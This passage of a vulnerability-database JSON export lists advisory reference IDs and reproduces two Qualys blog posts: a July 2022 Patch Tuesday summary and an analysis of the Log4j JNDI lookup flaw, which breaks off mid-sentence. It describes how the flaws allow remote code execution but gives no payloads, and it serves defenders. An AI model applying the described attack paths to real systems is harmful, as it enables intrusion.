"RHSA-2022:6174", "RHSA-2022:6175", "RHSA-2022:6176", "RHSA-2022:6177", "RHSA-2022:6178", "RHSA-2022:6179"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", 
"RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105", "RH:CVE-2022-38476", "RH:CVE-2022-38477", "RH:CVE-2022-38478"]}, {"type": "rocky", "idList": ["RLSA-2022:6164", "RLSA-2022:6175"]}, {"type": "saint", "idList": ["SAINT:3A3289A18B5C46A88581C9E8D4D0CF5A", "SAINT:5DC0FF1D23C8E8C36A1A8D72F1EB2B74", "SAINT:DB6048DE08200736030664D3F0E6C764"]}, {"type": "schneier", "idList": ["SCHNEIER:FECDA04283F9CFE2D14C1550420A1804"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0C40BC07DFF80D4B158D166D0DC2C870", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:6C418779587ADE032AB673F44440002B", "SECURELIST:70BCDF20EABD280713CFF28CEE3C6374", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:75F0B75D28318C525992E42495D8C5EE", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", 
"SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:9E653409B4D8C46D45939FA37442E456", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:ADE333FF4D3F96FCD027E6BB825FFD9B", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:CE9654E321FEC18D47DA16E0CF9D0CCE", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:D9AF9603FDB076FD6351B6ED483A4947", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:E21F9D6D3E5AFD65C99FC385D4B5F1DC", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "SECURELIST:F6E885706A3B59254C617CE5C255F27B", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:92935", "SSV:96484"]}, {"type": "slackware", "idList": ["SSA-2022-0906204408", "SSA-2022-235-02", "SSA-2022-235-03"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1605-1", "OPENSUSE-SU-2021:1613-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2021:4118-1", "OPENSUSE-SU-2021:4208-1", "OPENSUSE-SU-2022:0002-1", "OPENSUSE-SU-2022:10055-1", "OPENSUSE-SU-2022:10057-1", "OPENSUSE-SU-2022:10086-1", "OPENSUSE-SU-2022:10087-1", 
"OPENSUSE-SU-2022:10088-1", "OPENSUSE-SU-2022:10092-1", "OPENSUSE-SU-2022:10117-1", "OPENSUSE-SU-2022:10118-1", "OPENSUSE-SU-2022:10119-1", "OPENSUSE-SU-2022:10120-1", "SUSE-SU-2022:3030-1", "SUSE-SU-2022:3281-1", "SUSE-SU-2022:3396-1"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-102347", "SMNTC-19793"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0AA83DE1427426ABF4723FDF049F6EEB", "TALOSBLOG:12103F398364269083FD96139F0F6562", "TALOSBLOG:224F6FF67DED69B2FFFA483B3490BCE0", "TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:422E9F3F2D27B5C62D821C614EBE60A6", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A0B0983119E043D75EA7712A7172A942", "TALOSBLOG:A52D0C18F59637804E33FC802E4F7F00", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:A841859916AA26CF6EF3F3F403502778", "TALOSBLOG:A956D5C24762AE2DD21C63305475F8AB", "TALOSBLOG:AFFA9F54A1744A8B65903B06E9C56C3A", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:C9F50677FB4030903E6114F7C17FD8DB", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:CF2344D3946410B628ACF0DE5E525347", "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:E19A22F37E2F320BDD9B4727A5209175", "TALOSBLOG:E9524F807CE78585C607B458809D0AD7", "TALOSBLOG:E99AAC7F44B9D1EA471CB0F2A592FA92", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46", "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "TALOSBLOG:F032D3BBC6D695272384D4A3821130BF", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114", "TALOSBLOG:FB5080C7655BA3C4C2856F34457CBCD0"]}, {"type": "thn", "idList": ["THN:0521233945B9471C64D546BD2B006823", "THN:0ADE883013E260B4548F6E16D65487D3", "THN:125A440CBDB25270B696C1CCC246BEA1", "THN:161777F5DB73EF3AB5B13EF9F11E3374", 
"THN:1D10167F5D53B2791D676CF56488D5D9", "THN:1EFEC00D867275514EA180819C9EF104", "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "THN:222F7713CA968509F8C385BA29B0B6A5", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:2722097C084561C0EE24E84FA6AD506E", "THN:27F4624B58E2AB5E3EC8C74249CADF5C", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:31DAA0B9538D69BB42EFB6567298FF49", "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "THN:365025B2416483B34C70F02EDA44131E", "THN:368B6517F020AB4BF1B2344EDC8234A4", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:44DD118DC206D25EB4ECAE95173FE16E", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:52153F8855D24E20FDD2CC03040B1EF1", "THN:5293CFD6ACCF7BFD2EDDE976C7C06C15", "THN:54023E40C0AA4CB15793A39F3AF102AB", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:5CEFBA9FAF414B3F57548EAB0EEA1718", "THN:5D50D5AA81EE14FA1044614364EAEBC6", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:6B72050A86FFDCE9A0B2CF6F44293A1B", "THN:6C7E32993558CB9F19CAE15C18522582", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:7958F9B1AA180122992C6A0FADB03536", "THN:7A6D54BC76D090840197DDF871D59731", "THN:802C6445DD27FFC7978D22CC3182AD58", "THN:80C4CCCAB293DD273948D1317EAC8B73", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:8200D2C2E1DD329D680C5E699177551B", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:8A60310AB796B7372A105B7C8811306B", "THN:8C2FBC83F6EC62900F1887F00903447F", "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "THN:8EAD85C313EF85BE8D38BAAD851B106E", "THN:92A38DD61E285B0CDD7C80A398BDB187", "THN:933FE23273AB5250B949633A337D44E1", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", 
"THN:A24E3ECC17FDA35932981ED1D0B9B351", "THN:A48A11A9708B43B68518F6625F1C0CB8", "THN:A5B36072ED31304F26AF0879E3E5710E", "THN:AE8CC4929BA80C03ABF4AA5FAB5465CC", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:B399D1943153CEEF405B85D4310C2142", "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BAC30CCFD2AEEC91A6E02417A6B55F56", "THN:BD014635C5F702379060A20290985162", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C4188C7A44467E425407D33067C14094", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:C73B84809CDC20C90C26FF1B7F56F5D4", "THN:CB1C2DA47986D8345154BCABBFE41314", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:CD69EF060C75E2FF4DB33C7C492E75B1", "THN:CE191128AE56CD5C614344408C285C87", "THN:D010C92A9BC9913717ECAC2624F32E80", "THN:D18D5B68E1C8C3E3C323D4C71C3B2375", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "THN:DADA9CB340C28F942D085928B22B103F", "THN:DF2B6840863D6847D7088B1A07B19A4A", "THN:DFA2CC41C78DFA4BED87B1410C21CE2A", "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:E7E8D45492BAD83E88C89D34F8502485", "THN:ECDABD8FB1E94F5D8AFD13E4C1CB5840", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:EDC4E93542AFAF751E67BF527C826DA4", "THN:F91523FE89728E4535456872C0532560", "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "THN:FBCEC8F0CE0D3932FE4C315878C48403", "THN:FFFF05ECDE44C9ED26B53D328B60689B"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:02A472487653A461080415A3F7BB23D2", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", 
"THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0A9A930C281A9194FBCA1A6C9F168F74", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B290DDF3FE14178760FDC2229CB1383", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C3BAA4DB9E2B5E8A30DD20A987FCE03", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FD7F2FA7F2D3383F582553124EA843D", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:10245D9804511A09607265485D240FFF", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:138507F793D8399AF0EE1640C46A9698", "THREATPOST:138F67583DAC26A61D1AB90A018F1250", "THREATPOST:13D4AE4C03A3BF687491FDA1E8D732C7", 
{"qualysblog": [{"lastseen": "2022-07-15T23:58:32", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 84 vulnerabilities (aka flaws) in the July 2022 update, including four (4) vulnerabilities classified as **_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday cumulative Windows update includes the fix for one (1) actively exploited zero-day vulnerability ([CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)). Earlier this month, July 6, 2022, Microsoft also released two (2) Microsoft Edge (Chromium-Based) security updates.\n\nMicrosoft has fixed several flaws in its software, including Denial of Service (DoS), Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution (RCE), Security Feature Bypass, and Tampering.\n\nMany of the vulnerabilities patched this month relate to remote code execution, but there are no reports of active exploitation (in the wild) except for [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>), a Windows CSRSS Elevation of Privilege Vulnerability.\n\n## The July 2022 Microsoft vulnerabilities are classified as follows: \n\n\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/07/13/microsoft-patches-84-vulnerabilities-including-one-zero-day-and-four-critical-in-the-july-2022-patch-tuesday/>)\n\n* * *\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) | Windows CSRSS Elevation of Privilege Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nElevation of Privilege - Important - An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. 
(Article [5015874](<https://support.microsoft.com/help/5015874>))\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Detected_**\n\n* * *\n\n# **Microsoft Critical Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) covers multiple Microsoft product families, including Azure, Browser, ESU, Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 63 unique Microsoft products/versions are affected.\n\nDownloads include Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30221](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30221>) | Windows Graphics Component Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nAn attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim's system in the context of the targeted user.\n\nWindows 7 Service Pack 1 or Windows Server 2008 R2 Service Pack 1 are only affected by this vulnerability if either RDP 8.0 or RDP 8.1 is installed. 
If you do not have either of these versions of RDP installed on Windows 7 SP1 or Windows Server 2008 R2 SP1, then you are not affected by this vulnerability.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22029](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22029>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22038](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22038>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.1/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to invest time in repeated exploitation attempts through sending constant or intermittent data.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [CVE-2022-22039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22039>) | Windows Network File System Remote Code Execution Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.5/10.\n\nSuccessful exploitation of this vulnerability requires an attacker to win a race condition.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to 
trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Microsoft Last But Not Least**\n\nEarlier in July, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities [CVE-2022-2294](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2294>) and [CVE-2022-2295](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-2295>). The vulnerability assigned to each of these CVEs is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released four (4) [advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 27 vulnerabilities affecting Adobe Acrobat, Character Animator, Photoshop, Reader, and RoboHelp applications. Of these 27 vulnerabilities, 18 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**; ranging in severity from a CVSS score of 6.5/10 to 7.8/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-10](<https://helpx.adobe.com/security/products/robohelp/apsb22-10.html>) | Security update available for RoboHelp\n\nThis update resolves one (1) [**_Important_** ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerability.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for RoboHelp. This update resolves a vulnerability rated [important](<https://helpx.adobe.com/security/severity-ratings.html>). 
Successful exploitation could lead to arbitrary code execution in the context of current user. \n\n* * *\n\n### [APSB22-32](<https://helpx.adobe.com/security/products/acrobat/apsb22-32.html>) | Security update available for Adobe Acrobat and Reader\n\nThis update resolves 22 vulnerabilities; 15 **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and seven (7) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_**[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 2**_\n\nAdobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>), and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-34](<https://helpx.adobe.com/security/products/character_animator/apsb22-34.html>) | Security Updates Available for Adobe Character Animator\n\nThis update resolves two (2) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>) _**vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. 
Successful exploitation could lead to arbitrary code execution.\n\n* * *\n\n### [APSB22-35](<https://helpx.adobe.com/security/products/photoshop/apsb22-35.html>) | Security update available for Adobe Photoshop\n\nThis update resolves two (2) vulnerabilities; one (1) **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_**, and one (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves a [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability and an [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerability. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n* * *\n\n# Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n* * *\n\n# Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`91921` OR qid:`91922` OR qid:`91923` OR qid:`91924` OR qid:`91927` OR qid:`110411` OR qid:`110412` OR qid:`376725` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-12T20:09:23", "type": "qualysblog", "title": "July 2022 Patch Tuesday | Microsoft Releases 84 Vulnerabilities with 4 Critical, plus 2 Microsoft Edge (Chromium-Based); Adobe Releases 4 Advisories, 27 Vulnerabilities with 18 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-30190", "CVE-2022-30221"], "modified": "2022-07-12T20:09:23", "id": "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T10:37:30", "description": "On December 09, 2021, a critical remote code execution vulnerability was identified in Apache Log4j2 after proof-of-concepts were leaked publicly, affecting Apache Log4j 2.x 
<= 2.15.0-rc1. The vulnerability is being tracked as CVE-2021-44228 with CVSSv3 10 score and affects numerous applications which are using the Log4j2 library.\n\nSuccessful exploitation of this vulnerability could allow a remote attacker to download and execute arbitrary code on the target system. With the vulnerability being actively exploited in the wild, considering the gravity of the situation, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150440**, **150441** which sends specially crafted requests to the target server to detect vulnerable web application instances using the Log4j2 library. Once successfully detected, users can remediate the vulnerability by upgrading to **Apache Log4j** **2.17.1**.\n\nOn December 14, 2021, [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) was published to address the deficiencies in CVE-2021-44228. Later it was also identified that under non-default configuration Apache Log4j 2.15.0 could allow an attacker to exfiltrate data and achieve remote code execution (RCE). Qualys WAS team is working on improvements to our detections.\n\nOn December 27, 2021, **[Log4j 2.17.1](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.17.1>)** was released to patch a new arbitrary code execution vulnerability discovered in version 2.17.0. The vulnerability is tracked as [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) and affects versions 2.0-alpha7 to 2.17.0 excluding security fix releases 2.3.2 and 2.12.4.\n\n### About CVE-2021-44228\n\nApache Log4j is an extremely popular java library used by application developers to log data, this logging functionality helps with debugging issues and security incidents. The logged untrusted data could be errors such as exception traces, authentication failures, and other unpredicted vectors of user input. 
If the data contains a certain payload, the JNDI lookup method triggers and executes arbitrary code from attacker-controlled servers leading to Remote Code Execution Vulnerability.\n\n#### Vulnerability analysis\n\nIn Log4j2 the [lookups](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html>) functionality gives the user the ability to add values to the configuration at arbitrary places with ease of maintaining the format. There are multiple lookup methods such as Map Lookup, Environment Lookup, Context Map Lookup, etc.\n\nThe vulnerability was introduced in Log4j2 version 2.0-beta9 when the \u201cJNDILookup plugin\u201d was added as part of lookup methods to the [library](<https://logging.apache.org/log4j/2.x/changes-report.html#a2.0-beta9>). As per official [documentation](<https://logging.apache.org/log4j/log4j-2.3/manual/lookups.html#JndiLookup>):\n\n**_"The JndiLookup allows variables to be retrieved via JNDI. By default, the key will be prefixed with java:comp/env/, however, if the key contains a ":" no prefix will be added."_**\n\nJNDI which stands for \u201cJava Naming and Directory Interface\u201d is a Java API which allows Java applications to perform look-ups and retrieve Java objects using protocols such as LDAP, RMI, DNS, etc. This JNDI lookup allows a developer to 